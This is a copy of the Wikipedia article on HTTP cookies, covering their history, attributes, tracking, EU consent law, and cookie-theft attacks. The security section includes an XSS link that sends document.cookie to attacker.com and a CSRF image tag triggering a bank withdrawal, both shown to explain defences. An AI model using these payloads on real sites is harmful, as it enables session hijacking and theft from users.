Hubbry Logo
HTTP cookieHTTP cookieMain
Open search
HTTP cookie
Community hub
HTTP cookie
logo
8 pages, 0 posts
0 subscribers
Be the first to start a discussion here.
Be the first to start a discussion here.
Contribute something
HTTP cookie
HTTP cookie
from Wikipedia

An HTTP cookie (also called web cookie, Internet cookie, browser cookie, or simply cookie) is a small block of data created by a web server while a user is browsing a website and placed on the user's computer or other device by the user's web browser. Cookies are placed on the device used to access a website, and more than one cookie may be placed on a user's device during a session.

Cookies serve useful and sometimes essential functions on the web. They enable web servers to store stateful information (such as items added in the shopping cart in an online store) on the user's device or to track the user's browsing activity (including clicking particular buttons, logging in, or recording which pages were visited in the past).[1] They can also be used to save information that the user previously entered into form fields, such as names, addresses, passwords, and payment card numbers for subsequent use.

Authentication cookies are commonly used by web servers to authenticate that a user is logged in, and with which account they are logged in. Without the cookie, users would need to authenticate themselves by logging in on each page containing sensitive information that they wish to access. The security of an authentication cookie generally depends on the security of the issuing website and the user's web browser, and on whether the cookie data is encrypted. Security vulnerabilities may allow a cookie's data to be read by an attacker, used to gain access to user data, or used to gain access (with the user's credentials) to the website to which the cookie belongs (see cross-site scripting and cross-site request forgery for examples).[2]

Tracking cookies, and especially third-party tracking cookies, are commonly used as ways to compile long-term records of individuals' browsing histories — a potential privacy concern that prompted European[3] and U.S. lawmakers to take action in 2011.[4][5] European law requires that all websites targeting European Union member states gain "informed consent" from users before storing non-essential cookies on their device.

Background

[edit]

Origin of the name

[edit]
HTTP cookies share their name with a popular baked treat.

The term cookie was coined by web-browser programmer Lou Montulli. It was derived from the term magic cookie, which is a packet of data a program receives and sends back unchanged, used by Unix programmers.[6][7]

History

[edit]

Magic cookies were already used in computing when computer programmer Lou Montulli had the idea of using them in web communications in June 1994.[8] At the time, he was an employee of Netscape Communications, which was developing an e-commerce application for MCI. Vint Cerf and John Klensin represented MCI in technical discussions with Netscape Communications. MCI did not want its servers to have to retain partial transaction states, which led them to ask Netscape to find a way to store that state in each user's computer instead. Cookies provided a solution to the problem of reliably implementing a virtual shopping cart.[9][10]

Together with John Giannandrea, Montulli wrote the initial Netscape cookie specification the same year. Version 0.9beta of Mosaic Netscape, released on October 13, 1994,[11][12] supported cookies.[10] The first use of cookies (out of the labs) was checking whether visitors to the Netscape website had already visited the site. Montulli applied for a patent for the cookie technology in 1995, which was granted in 1998.[13] Support for cookies was integrated with Internet Explorer in version 2, released in October 1995.[14]

The introduction of cookies was not widely known to the public at the time. In particular, cookies were accepted by default, and users were not notified of their presence.[15] The public learned about cookies after the Financial Times published an article about them on February 12, 1996.[16] In the same year, cookies received a lot of media attention, especially because of potential privacy implications. Cookies were discussed in two U.S. Federal Trade Commission hearings in 1996 and 1997.[2]

The development of the formal cookie specifications was already ongoing. In particular, the first discussions about a formal specification started in April 1995 on the www-talk mailing list. A special working group within the Internet Engineering Task Force (IETF) was formed. Two alternative proposals for introducing state in HTTP transactions had been proposed by Brian Behlendorf and David Kristol respectively. But the group, headed by Kristol himself and Lou Montulli, soon decided to use the Netscape specification as a starting point. In February 1996, the working group identified third-party cookies as a considerable privacy threat. The specification produced by the group was eventually published as RFC 2109 in February 1997. It specifies that third-party cookies were either not allowed at all, or at least not enabled by default.[17] At this time, advertising companies were already using third-party cookies. The recommendation about third-party cookies of RFC 2109 was not followed by Netscape and Internet Explorer. RFC 2109 was superseded by RFC 2965 in October 2000.

RFC 2965 added a Set-Cookie2 header field, which informally came to be called "RFC 2965-style cookies" as opposed to the original Set-Cookie header field which was called "Netscape-style cookies".[18][19] Set-Cookie2 was seldom used, however, and was deprecated in RFC 6265 in April 2011 which was written as a definitive specification for cookies as used in the real world.[20] No modern browser recognizes the Set-Cookie2 header field.[21]

Terminology

[edit]
[edit]

A session cookie (also known as an in-memory cookie, transient cookie or non-persistent cookie) exists only in temporary memory while the user navigates a website.[22] Session cookies expire or are deleted when the user closes the web browser.[23] Session cookies are identified by the browser by the absence of an expiration date assigned to them.

[edit]

A persistent cookie expires at a specific date or after a specific length of time. For the persistent cookie's lifespan set by its creator, its information will be transmitted to the server every time the user visits the website that it belongs to, or every time the user views a resource belonging to that website from another website (such as an advertisement).

For this reason, persistent cookies are sometimes referred to as tracking cookies[24][25] because they can be used by advertisers to record information about a user's web browsing habits over an extended period of time. Persistent cookies are also used for reasons such as keeping users logged into their accounts on websites, to avoid re-entering login credentials at every visit. (See § Uses, below.)

[edit]

A secure cookie can only be transmitted over an encrypted connection (i.e. HTTPS). They cannot be transmitted over unencrypted connections (i.e. HTTP). This makes the cookie less likely to be exposed to cookie theft via eavesdropping. A cookie is made secure by adding the Secure flag to the cookie.

[edit]

An http-only cookie cannot be accessed by client-side APIs, such as JavaScript. This restriction eliminates the threat of cookie theft via cross-site scripting (XSS).[26] However, the cookie remains vulnerable to cross-site tracing (XST) and cross-site request forgery (CSRF) attacks. A cookie is given this characteristic by adding the HttpOnly flag to the cookie.

[edit]

In 2016 Google Chrome version 51 introduced[27] a new kind of cookie with attribute SameSite with possible values of Strict, Lax or None.[28] With attribute SameSite=Strict, the browsers would only send cookies to a target domain that is the same as the origin domain. This would effectively mitigate cross-site request forgery (CSRF) attacks. With SameSite=Lax, browsers would send cookies with requests to a target domain even it is different from the origin domain, but only for safe requests such as GET (POST is unsafe) and not third-party cookies (inside iframe). Attribute SameSite=None would allow third-party (cross-site) cookies, however, most browsers require secure attribute on SameSite=None cookies.[29]

The Same-site cookie is incorporated into a new RFC draft for "Cookies: HTTP State Management Mechanism"[30] to update RFC 6265 (if approved).

Chrome, Firefox, and Edge started to support Same-site cookies.[31] The key of rollout is the treatment of existing cookies without the SameSite attribute defined, Chrome has been treating those existing cookies as if SameSite=None, this would let all website/applications run as before. Google intended to change that default to SameSite=Lax in Chrome 80 planned to be released in February 2020,[32] but due to potential for breakage of those applications/websites that rely on third-party/cross-site cookies and COVID-19 circumstances, Google postponed this change to Chrome 84.[33][34]

Supercookie

[edit]

A supercookie is a cookie with an origin of a top-level domain (such as .com) or a public suffix (such as .co.uk). Ordinary cookies, by contrast, have an origin of a specific domain name, such as example.com.

Supercookies can be a potential security concern and are therefore often blocked by web browsers. If unblocked by the browser, an attacker in control of a malicious website could set a supercookie and potentially disrupt or impersonate legitimate user requests to another website that shares the same top-level domain or public suffix as the malicious website. For example, a supercookie with an origin of .com could maliciously affect a request made to example.com, even if the cookie did not originate from example.com. This can be used to fake logins or change user information.

The Public Suffix List[35] helps to mitigate the risk that supercookies pose. The Public Suffix List is a cross-vendor initiative that aims to provide an accurate and up-to-date list of domain name suffixes. Older versions of browsers may not have an up-to-date list, and will therefore be vulnerable to supercookies from certain domains.

Other uses

[edit]

The term supercookie is sometimes used for tracking technologies that do not rely on HTTP cookies. Two such supercookie mechanisms were found on Microsoft websites in August 2011: cookie syncing that respawned MUID (machine unique identifier) cookies, and ETag cookies.[36] Due to media attention, Microsoft later disabled this code.[37] In a 2021 blog post, Mozilla used the term supercookie to refer to the use of browser cache as a means of tracking users across sites.[38]

[edit]

A zombie cookie is data and code that has been placed by a web server on a visitor's computer or other device in a hidden location outside the visitor's web browser's dedicated cookie storage location, and that automatically recreates a HTTP cookie as a regular cookie after the original cookie had been deleted. The zombie cookie may be stored in multiple locations, such as Flash Local shared object, HTML5 Web storage, and other client-side and even server-side locations, and when absence is detected in one of the locations, the missing instance is recreated by the JavaScript code using the data stored in other locations.[39][40]

[edit]

A cookie wall pops up on a website and informs the user of the website's cookie usage. It has no reject option, and the website is not accessible without tracking cookies.

Structure

[edit]

A cookie consists of the following components:[41][42][43]

  1. Name
  2. Value
  3. Zero or more attributes (name/value pairs). Attributes store information such as the cookie's expiration, domain, and flags (such as Secure and HttpOnly).

Uses

[edit]

Session management

[edit]

Cookies were originally introduced to provide a way for users to record items they want to purchase as they navigate throughout a website (a virtual shopping cart or shopping basket).[9][10] Today, however, the contents of a user's shopping cart are usually stored in a database on the server, rather than in a cookie on the client. To keep track of which user is assigned to which shopping cart, the server sends a cookie to the client that contains a unique session identifier (typically, a long string of random letters and numbers). Because cookies are sent to the server with every request the client makes, that session identifier will be sent back to the server every time the user visits a new page on the website, which lets the server know which shopping cart to display to the user.

Another popular use of cookies is for logging into websites. When the user visits a website's login page, the web server typically sends the client a cookie containing a unique session identifier. When the user successfully logs in, the server remembers that that particular session identifier has been authenticated and grants the user access to its services.

Because session cookies only contain a unique session identifier, this makes the amount of personal information that a website can save about each user virtually limitless—the website is not limited to restrictions concerning how large a cookie can be. Session cookies also help to improve page load times, since the amount of information in a session cookie is small and requires little bandwidth.

Personalization

[edit]

Cookies can be used to remember information about the user in order to show relevant content to that user over time. For example, a web server might send a cookie containing the username that was last used to log into a website, so that it may be filled in automatically the next time the user logs in.

Many websites use cookies for personalization based on the user's preferences. Users select their preferences by entering them in a web form and submitting the form to the server. The server encodes the preferences in a cookie and sends the cookie back to the browser. This way, every time the user accesses a page on the website, the server can personalize the page according to the user's preferences. For example, the Google search engine once used cookies to allow users (even non-registered ones) to decide how many search results per page they wanted to see. Also, DuckDuckGo uses cookies to allow users to set the viewing preferences like colors of the web page.

Tracking

[edit]

Tracking cookies are used to track users' web browsing habits. This can also be done to some extent by using the IP address of the computer requesting the page or the referer field of the HTTP request header, but cookies allow for greater precision. This can be demonstrated as follows:

  1. If the user requests a page of the site, but the request contains no cookie, the server presumes that this is the first page visited by the user. So the server creates a unique identifier (typically a string of random letters and numbers) and sends it as a cookie back to the browser together with the requested page.
  2. From this point on, the cookie will automatically be sent by the browser to the server every time a new page from the site is requested. The server not only sends the page as usual but also stores the URL of the requested page, the date/time of the request, and the cookie in a log file.

By analyzing this log file, it is then possible to find out which pages the user has visited, in what sequence, and for how long.

Corporations exploit users' web habits by tracking cookies to collect information about buying habits. The Wall Street Journal found that America's top fifty websites installed an average of sixty-four pieces of tracking technology onto computers, resulting in a total of 3,180 tracking files.[44] The data can then be collected and sold to bidding corporations.

Implementation

[edit]
A possible interaction between a web browser and a web server holding a web page in which the server sends a cookie to the browser and the browser sends it back when requesting another page

Cookies are arbitrary pieces of data, usually chosen and first sent by the web server, and stored on the client computer by the web browser. The browser then sends them back to the server with every request, introducing states (memory of previous events) into otherwise stateless HTTP transactions. Without cookies, each retrieval of a web page or component of a web page would be an isolated event, largely unrelated to all other page views made by the user on the website. Although cookies are usually set by the web server, they can also be set by the client using a scripting language such as JavaScript (unless the cookie's HttpOnly flag is set, in which case the cookie cannot be modified by scripting languages).

The cookie specifications[45][46] require that browsers meet the following requirements in order to support cookies:

  • Can support cookies as large as 4,096 bytes in size.
  • Can support at least 50 cookies per domain (i.e. per website).
  • Can support at least 3,000 cookies in total.
[edit]

Cookies are set using the Set-Cookie header field, sent in an HTTP response from the web server. This header field instructs the web browser to store the cookie and send it back in future requests to the server (the browser will ignore this header field if it does not support cookies or has disabled cookies).

As an example, the browser sends its first HTTP request for the homepage of the www.example.org website:

GET /index.html HTTP/1.1
Host: www.example.org
...

The server responds with two Set-Cookie header fields:

HTTP/1.0 200 OK
Content-type: text/html
Set-Cookie: theme=light
Set-Cookie: sessionToken=abc123; Expires=Wed, 09 Jun 2021 10:18:14 GMT
...

The server's HTTP response contains the contents of the website's homepage. But it also instructs the browser to set two cookies. The first, theme, is considered to be a session cookie since it does not have an Expires or Max-Age attribute. Session cookies are intended to be deleted by the browser when the browser closes. The second, sessionToken, is considered to be a persistent cookie since it contains an Expires attribute, which instructs the browser to delete the cookie at a specific date and time.

Next, the browser sends another request to visit the spec.html page on the website. This request contains a Cookie header field, which contains the two cookies that the server instructed the browser to set:

GET /spec.html HTTP/1.1
Host: www.example.org
Cookie: theme=light; sessionToken=abc123
...

This way, the server knows that this HTTP request is related to the previous one. The server would answer by sending the requested page, possibly including more Set-Cookie header fields in the HTTP response in order to instruct the browser to add new cookies, modify existing cookies, or remove existing cookies. To remove a cookie, the server must include a Set-Cookie header field with an expiration date in the past.

The value of a cookie may consist of any printable ASCII character (! through ~, Unicode \u0021 through \u007E) excluding ,and; and whitespace characters. The name of a cookie excludes the same characters, as well as =, since that is the delimiter between the name and value. The cookie standard RFC 2965 is more restrictive but not implemented by browsers.

The term cookie crumb is sometimes used to refer to a cookie's name–value pair.[47]

Cookies can also be set by scripting languages such as JavaScript that run within the browser. In JavaScript, the object document.cookie is used for this purpose. For example, the instruction document.cookie = "temperature=20" creates a cookie of name temperature and value 20.[48]

[edit]

In addition to a name and value, cookies can also have one or more attributes. Browsers do not include cookie attributes in requests to the server—they only send the cookie's name and value. Cookie attributes are used by browsers to determine when to delete a cookie, block a cookie or whether to send a cookie to the server.

Domain and Path

[edit]

The Domain and Path attributes define the scope of the cookie. They essentially tell the browser what website the cookie belongs to. For security reasons, cookies can only be set on the current resource's top domain and its subdomains, and not for another domain and its subdomains. For example, the website example.org cannot set a cookie that has a domain of foo.com because this would allow the website example.org to control the cookies of the domain foo.com.

If a cookie's Domain and Path attributes are not specified by the server, they default to the domain and path of the resource that was requested.[49] However, in most browsers there is a difference between a cookie set from foo.com without a domain, and a cookie set with the foo.com domain. In the former case, the cookie will only be sent for requests to foo.com, also known as a host-only cookie. In the latter case, all subdomains are also included (for example, docs.foo.com).[50][51] A notable exception to this general rule is Edge prior to Windows 10 RS3 and Internet Explorer prior to IE 11 and Windows 10 RS4 (April 2018), which always sends cookies to subdomains regardless of whether the cookie was set with or without a domain.[52]

Below is an example of some Set-Cookie header fields in the HTTP response of a website after a user logged in. The HTTP request was sent to a webpage within the docs.foo.com subdomain:

HTTP/1.0 200 OK
Set-Cookie: LSID=DQAAAK…Eaem_vYg; Path=/accounts; Expires=Wed, 13 Jan 2021 22:23:01 GMT; Secure; HttpOnly
Set-Cookie: HSID=AYQEVn…DKrdst; Domain=.foo.com; Path=/; Expires=Wed, 13 Jan 2021 22:23:01 GMT; HttpOnly
Set-Cookie: SSID=Ap4P…GTEq; Domain=foo.com; Path=/; Expires=Wed, 13 Jan 2021 22:23:01 GMT; Secure; HttpOnly
...

The first cookie, LSID, has no Domain attribute, and has a Path attribute set to /accounts. This tells the browser to use the cookie only when requesting pages contained in docs.foo.com/accounts (the domain is derived from the request domain). The other two cookies, HSID and SSID, would be used when the browser requests any subdomain in .foo.com on any path (for example www.foo.com/bar). The prepending dot is optional in recent standards, but can be added for compatibility with RFC 2109 based implementations.[53]

Expires and Max-Age

[edit]

The Expires attribute defines a specific date and time for when the browser should delete the cookie. The date and time are specified in the form Wdy, DD Mon YYYY HH:MM:SS GMT, or in the form Wdy, DD Mon YY HH:MM:SS GMT for values of YY where YY is greater than or equal to 0 and less than or equal to 69.[54]

Alternatively, the Max-Age attribute can be used to set the cookie's expiration as an interval of seconds in the future, relative to the time the browser received the cookie. Below is an example of three Set-Cookie header fields that were received from a website after a user logged in:

HTTP/1.0 200 OK
Set-Cookie: lu=Rg3vHJZnehYLjVg7qi3bZjzg; Expires=Tue, 15 Jan 2013 21:47:38 GMT; Path=/; Domain=.example.com; HttpOnly
Set-Cookie: made_write_conn=1295214458; Path=/; Domain=.example.com
Set-Cookie: reg_fb_gate=deleted; Expires=Thu, 01 Jan 1970 00:00:01 GMT; Path=/; Domain=.example.com; HttpOnly

The first cookie, lu, is set to expire sometime on 15 January 2013. It will be used by the client browser until that time. The second cookie, made_write_conn, does not have an expiration date, making it a session cookie. It will be deleted after the user closes their browser. The third cookie, reg_fb_gate, has its value changed to deleted, with an expiration time in the past. The browser will delete this cookie right away because its expiration time is in the past. Note that cookie will only be deleted if the domain and path attributes in the Set-Cookie field match the values used when the cookie was created.

As of 2016 Internet Explorer did not support Max-Age.[55][56]

Secure and HttpOnly

[edit]

The Secure and HttpOnly attributes do not have associated values. Rather, the presence of just their attribute names indicates that their behaviors should be enabled.

The Secure attribute is meant to keep cookie communication limited to encrypted transmission, directing browsers to use cookies only via secure/encrypted connections. However, if a web server sets a cookie with a secure attribute from a non-secure connection, the cookie can still be intercepted when it is sent to the user by man-in-the-middle attacks. Therefore, for maximum security, cookies with the Secure attribute should only be set over a secure connection.

The HttpOnly attribute directs browsers not to expose cookies through channels other than HTTP (and HTTPS) requests. This means that the cookie cannot be accessed via client-side scripting languages (notably JavaScript), and therefore cannot be stolen easily via cross-site scripting (a pervasive attack technique).[57]

Browser settings

[edit]

Most modern browsers support cookies and allow the user to disable them. The following are common options:[58]

  • To enable or disable cookies completely, so that they are always accepted or always blocked.
  • To view and selectively delete cookies using a cookie manager.
  • To fully wipe all private data, including cookies.

Add-on tools for managing cookie permissions also exist.[59][60][61][62]

[edit]

Cookies have some important implications for the privacy and anonymity of web users. While cookies are sent only to the server setting them or a server in the same Internet domain, a web page may contain images or other components stored on servers in other domains. Cookies that are set during retrieval of these components are called third-party cookies. A third-party cookie, belongs to a domain different from the one shown in the address bar. This sort of cookie typically appears when web pages feature content from external websites, such as banner advertisements. This opens up the potential for tracking the user's browsing history and is used by advertisers to serve relevant advertisements to each user.

In this fictional example, an advertising company has placed banners in two websites. By hosting the banner images on its servers and using third-party cookies, the advertising company is able to track the browsing of users across these two sites.

As an example, suppose a user visits www.example.org. This website contains an advertisement from ad.foxytracking.com, which, when downloaded, sets a cookie belonging to the advertisement's domain (ad.foxytracking.com). Then, the user visits another website, www.foo.com, which also contains an advertisement from ad.foxytracking.com and sets a cookie belonging to that domain (ad.foxytracking.com). Eventually, both of these cookies will be sent to the advertiser when loading their advertisements or visiting their website. The advertiser can then use these cookies to build up a browsing history of the user across all the websites that have ads from this advertiser, through the use of the HTTP referer header field.

As of 2014, some websites were setting cookies readable for over 100 third-party domains.[63] On average, a single website was setting 10 cookies, with a maximum number of cookies (first- and third-party) reaching over 800.[64]

The older standards for cookies, RFC 2109[17] and RFC 2965, recommend that browsers should protect user privacy and not allow sharing of cookies between servers by default. However, the newer standard, RFC 6265, explicitly allows user agents to implement whichever third-party cookie policy they wish. Most modern web browsers contain privacy settings that can block third-party cookies. Since 2020, Apple Safari,[65] Firefox,[66] and Brave[67] block all third-party cookies by default. Safari allows embedded sites to use Storage Access API to request permission to set first-party cookies. In May 2020, Google Chrome 83 introduced new features to block third-party cookies by default in its Incognito mode for private browsing, making blocking optional during normal browsing. The same update also added an option to block first-party cookies.[68] In April 2024, Chrome postponed third-party cookie blocking by default to 2025.[69] In July 2024, Google announced plan to avoid blocking third-party cookies by default and instead prompt users to allow third-party cookies.[70]

Privacy

[edit]

The possibility of building a profile of users is a privacy threat, especially when tracking is done across multiple domains using third-party cookies. For this reason, some countries have legislation about cookies.

Website operators who do not disclose third-party cookie use to consumers run the risk of harming consumer trust if cookie use is discovered. Having clear disclosure (such as in a privacy policy) tends to eliminate any negative effects of such cookie discovery.[71][failed verification]

The United States government set strict rules on setting cookies in 2000 after it was disclosed that the White House drug policy office used cookies to track computer users viewing its online anti-drug advertising. In 2002, privacy activist Daniel Brandt found that the CIA had been leaving persistent cookies on computers that had visited its website. When notified it was violating policy, CIA stated that these cookies were not intentionally set and stopped setting them. On December 25, 2005, Brandt discovered that the National Security Agency (NSA) had been leaving two persistent cookies on visitors' computers due to a software upgrade. After being informed, the NSA immediately disabled the cookies.[72]

[edit]

In 2002, the European Union launched the Directive on Privacy and Electronic Communications (e-Privacy Directive), a policy requiring end users' consent for the placement of cookies, and similar technologies for storing and accessing information on users' equipment.[73][74] In particular, Article 5 Paragraph 3 mandates that storing technically unnecessary data on a user's computer can only be done if the user is provided information about how this data is used, and the user is given the possibility of denying this storage operation. The Directive does not require users to authorise or be provided notice of cookie usage that are functionally required for delivering a service they have requested, for example to retain settings, store log-in sessions, or remember what is in a user's shopping basket.[75]

In 2009, the law was amended by Directive 2009/136/EC, which included a change to Article 5, Paragraph 3. Instead of having an option for users to opt out of cookie storage, the revised Directive requires consent to be obtained for cookie storage.[74] The definition of consent is cross-referenced to the definition in European data protection law, firstly the Data Protection Directive 1995 and subsequently the General Data Protection Regulation (GDPR). As the definition of consent was strengthened in the text of the GDPR, this increased the quality of consent required by those storing and accessing information such as cookies on users devices. In a case decided under the Data Protection Directive however, the Court of Justice of the European Union later confirmed however that the previous law implied the same strong quality of consent as the current instrument.[76] In addition to the requirement of consent which stems from storing or accessing information on a user's terminal device, the information in many cookies will be considered personal data under the GDPR alone, and will require a legal basis to process. This has been the case since the 1995 Data Protection Directive, which used an identical definition of personal data, although the GDPR in interpretative Recital 30 clarifies that cookie identifiers are included. While not all data processing under the GDPR requires consent, the characteristics of behavioural advertising mean that it is difficult or impossible to justify under any other ground.[77][78]

Consent under the combination of the GDPR and e-Privacy Directive has to meet a number of conditions in relation to cookies.[79] It must be freely given and unambiguous: preticked boxes were banned under both the Data Protection Directive 1995[76] and the GDPR (Recital 32).[80] The GDPR is specific that consent must be as 'easy to withdraw as to give',[80] meaning that a reject-all button must be as easy to access in terms of clicks and visibility as an 'accept all' button.[79] It must be specific and informed, meaning that consent relates to particular purposes for the use of this data, and all organisations seeking to use this consent must be specifically named.[81][82] The Court of Justice of the European Union has also ruled that consent must be 'efficient and timely', meaning that it must be gained before cookies are laid and data processing begins instead of afterwards.[83]

The industry's response has been largely negative. Robert Bond of the law firm Speechly Bircham describes the effects as "far-reaching and incredibly onerous" for "all UK companies". Simon Davis of Privacy International argues that proper enforcement would "destroy the entire industry".[84] However, scholars note that the onerous nature of cookie pop-ups stems from an attempt to continue to operate a business model through convoluted requests that may be incompatible with the GDPR.[77]

Academic studies and regulators both describe widespread non-compliance with the law. A study scraping 10,000 UK websites found that only 11.8% of sites adhered to minimal legal requirements, with only 33.4% of websites studied providing a mechanism to reject cookies that was as easy to use as accepting them.[79] A study of 17,000 websites found that 84% of sites breached this criterion, finding additionally that many laid third party cookies with no notice at all.[85] The UK regulator, the Information Commissioner's Office, stated in 2019 that the industry's 'Transparency and Consent Framework' from the advertising technology group the Interactive Advertising Bureau was 'insufficient to ensure transparency and fair processing of the personal data in question and therefore also insufficient to provide for free and informed consent, with attendant implications for PECR [e-Privacy] compliance.'[81] Many companies that sell compliance solutions (Consent Management Platforms) permit them to be configured in manifestly illegal ways, which scholars have noted creates questions around the appropriate allocation of liability.[86]

A W3C specification called P3P was proposed for servers to communicate their privacy policy to browsers, allowing automatic, user-configurable handling. However, few websites implement the specification, and the W3C has discontinued work on the specification.[87]

Third-party cookies can be blocked by most browsers to increase privacy and reduce tracking by advertising and tracking companies without negatively affecting the user's web experience on all sites. Some sites operate 'cookie walls', which make access to a site conditional on allowing cookies either technically in a browser, through pressing 'accept', or both.[88] In 2020, the European Data Protection Board, composed of all EU data protection regulators, stated that cookie walls were illegal.

In order for consent to be freely given, access to services and functionalities must not be made conditional on the consent of a user to the storing of information, or gaining of access to information already stored, in the terminal equipment of a user (so called cookie walls).[89]

Many advertising operators have an opt-out option to behavioural advertising, with a generic cookie in the browser stopping behavioural advertising.[90][91] However, this is often ineffective against many forms of tracking, such as first-party tracking that is growing in popularity to avoid the impact of browsers blocking third party cookies.[92][93] Furthermore, if such a setting is more difficult to place than the acceptance of tracking, it remains in breach of the conditions of the e-Privacy Directive.[79]

[edit]

Most websites use cookies as the only identifiers for user sessions, because other methods of identifying web users have limitations and vulnerabilities. If a website uses cookies as session identifiers, attackers can impersonate users' requests by stealing a full set of victims' cookies. From the web server's point of view, a request from an attacker then has the same authentication as the victim's requests; thus the request is performed on behalf of the victim's session.

Listed here are various scenarios of cookie theft and user session hijacking (even without stealing user cookies) that work with websites relying solely on HTTP cookies for user identification.

Network eavesdropping

[edit]
A cookie can be stolen by another computer that is allowed reading from the network.

Traffic on a network can be intercepted and read by computers on the network other than the sender and receiver (particularly over unencrypted open Wi-Fi). This traffic includes cookies sent on ordinary unencrypted HTTP sessions. Where network traffic is not encrypted, attackers can therefore read the communications of other users on the network, including HTTP cookies as well as the entire contents of the conversations, for the purpose of a man-in-the-middle attack.

An attacker could use intercepted cookies to impersonate a user and perform a malicious task, such as transferring money out of the victim's bank account.

This issue can be resolved by securing the communication between the user's computer and the server by employing Transport Layer Security (HTTPS protocol) to encrypt the connection. A server can specify the Secure flag while setting a cookie, which will cause the browser to send the cookie only over an encrypted channel, such as a TLS connection.[45]

Publishing false sub-domain: DNS cache poisoning

[edit]

If an attacker is able to cause a DNS server to cache a fabricated DNS entry (called DNS cache poisoning), then this could allow the attacker to gain access to a user's cookies. For example, an attacker could use DNS cache poisoning to create a fabricated DNS entry of f12345.www.example.com that points to the IP address of the attacker's server. The attacker can then post an image URL from his own server (for example, http://f12345.www.example.com/img_4_cookie.jpg). Victims reading the attacker's message would download this image from f12345.www.example.com. Since f12345.www.example.com is a sub-domain of www.example.com, victims' browsers would submit all example.com-related cookies to the attacker's server.

If an attacker is able to accomplish this, it is usually the fault of the Internet Service Providers for not properly securing their DNS servers. However, the severity of this attack can be lessened if the target website uses secure cookies. In this case, the attacker would have the extra challenge[94] of obtaining the target website's TLS certificate from a certificate authority, since secure cookies can only be transmitted over an encrypted connection. Without a matching TLS certificate, victims' browsers would display a warning message about the attacker's invalid certificate, which would help deter users from visiting the attacker's fraudulent website and sending the attacker their cookies.

[edit]

Cookies can also be stolen using a technique called cross-site scripting. This occurs when an attacker takes advantage of a website that allows its users to post unfiltered HTML and JavaScript content. By posting malicious HTML and JavaScript code, the attacker can cause the victim's web browser to send the victim's cookies to a website the attacker controls.

As an example, an attacker may post a message on www.example.com with the following link:

<a href="#" onclick="window.location = 'http://attacker.com/stole.cgi?text=' + escape(document.cookie); return false;">Click here!</a>
Cross-site scripting: a cookie that should be only exchanged between a server and a client is sent to another party.

When another user clicks on this link, the browser executes the piece of code within the onclick attribute, thus replacing the string document.cookie with the list of cookies that are accessible from the current page. As a result, this list of cookies is sent to the attacker.com server. If the attacker's malicious posting is on an HTTPS website https://www.example.com, secure cookies will also be sent to attacker.com in plain text.

It is the responsibility of the website developers to filter out such malicious code.

Such attacks can be mitigated by using HttpOnly cookies. These cookies will not be accessible by client-side scripting languages like JavaScript, and therefore, the attacker will not be able to gather these cookies.

Cross-site scripting: proxy request

[edit]

In older versions of many browsers, there were security holes in the implementation of the XMLHttpRequest API. This API allows pages to specify a proxy server that would get the reply, and this proxy server is not subject to the same-origin policy. For example, a victim is reading an attacker's posting on www.example.com, and the attacker's script is executed in the victim's browser. The script generates a request to www.example.com with the proxy server attacker.com. Since the request is for www.example.com, all example.com cookies will be sent along with the request, but routed through the attacker's proxy server. Hence, the attacker would be able to harvest the victim's cookies.

This attack would not work with secure cookies, since they can only be transmitted over HTTPS connections, and the HTTPS protocol dictates end-to-end encryption (i.e. the information is encrypted on the user's browser and decrypted on the destination server). In this case, the proxy server would only see the raw, encrypted bytes of the HTTP request.

Cross-site request forgery

[edit]

For example, Bob might be browsing a chat forum where another user, Mallory, has posted a message. Suppose that Mallory has crafted an HTML image element that references an action on Bob's bank's website (rather than an image file), e.g.,

<img src="http://bank.example.com/withdraw?account=bob&amount=1000000&for=mallory">

If Bob's bank keeps his authentication information in a cookie, and if the cookie hasn't expired, then the attempt by Bob's browser to load the image will submit the withdrawal form with his cookie, thus authorizing a transaction without Bob's approval.

Cookiejacking

[edit]

Cookiejacking is an attack against Internet Explorer which allows the attacker to steal session cookies of a user by tricking a user into dragging an object across the screen.[95] Microsoft deemed the flaw low-risk because of "the level of required user interaction",[95] and the necessity of having a user already logged into the website whose cookie is stolen.[96] Despite this, a researcher tried the attack on 150 of their Facebook friends and obtained cookies of 80 of them via social engineering.[95]

Drawbacks of cookies

[edit]

Besides privacy concerns, cookies also have some technical drawbacks. In particular, they do not always accurately identify users, they can be used for security attacks, and they are often at odds with the Representational State Transfer (REST) software architectural style.[97][98]

Inaccurate identification

[edit]

If more than one browser is used on a computer, each usually has a separate storage area for cookies. Hence, cookies do not identify a person, but a combination of a user account, a computer, and a web browser. Thus, anyone who uses multiple accounts, computers, or browsers has multiple sets of cookies.[99]

Likewise, cookies do not differentiate between multiple users who share the same user account, computer, and browser.

Alternatives to cookies

[edit]

Some of the operations that can be done using cookies can also be done using other mechanisms.

Authentication and session management

[edit]

JSON Web Tokens

[edit]

A JSON Web Token (JWT) is a self-contained packet of information that can be used to store user identity and authenticity information. This allows them to be used in place of session cookies. Unlike cookies, which are automatically attached to each HTTP request by the browser, JWTs must be explicitly attached to each HTTP request by the web application.

HTTP authentication

[edit]

The HTTP protocol includes the basic access authentication and the digest access authentication protocols, which allow access to a web page only when the user has provided the correct username and password. If the server requires such credentials for granting access to a web page, the browser requests them from the user and, once obtained, the browser stores and sends them in every subsequent page request. This information can be used to track the user.

URL (query string)

[edit]

The query string part of the URL is the part that is typically used for this purpose, but other parts can be used as well. The Java Servlet and PHP session mechanisms both use this method if cookies are not enabled.

This method consists of the web server appending query strings containing a unique session identifier to all the links inside of a web page. When the user follows a link, the browser sends the query string to the server, allowing the server to identify the user and maintain state.

These kinds of query strings are very similar to cookies in that both contain arbitrary pieces of information chosen by the server and both are sent back to the server on every request. However, there are some differences. Since a query string is part of a URL, if that URL is later reused, the same attached piece of information will be sent to the server, which could lead to confusion. For example, if the preferences of a user are encoded in the query string of a URL and the user sends this URL to another user by e-mail, those preferences will be used for that other user as well.

Moreover, if the same user accesses the same page multiple times from different sources, there is no guarantee that the same query string will be used each time. For example, if a user visits a page by coming from a page internal to the site the first time, and then visits the same page by coming from an external search engine the second time, the query strings would likely be different. If cookies were used in this situation, the cookies would be the same.

Other drawbacks of query strings are related to security. Storing data that identifies a session in a query string enables session fixation attacks, referer logging attacks and other security exploits. Transferring session identifiers as HTTP cookies is more secure.

Hidden form fields

[edit]

Another form of session tracking is to use web forms with hidden fields. This technique is very similar to using URL query strings to hold the information and has many of the same advantages and drawbacks. In fact, if the form is handled with the HTTP GET method, then this technique is similar to using URL query strings, since the GET method adds the form fields to the URL as a query string. But most forms are handled with HTTP POST, which causes the form information, including the hidden fields, to be sent in the HTTP request body, which is neither part of the URL, nor of a cookie.

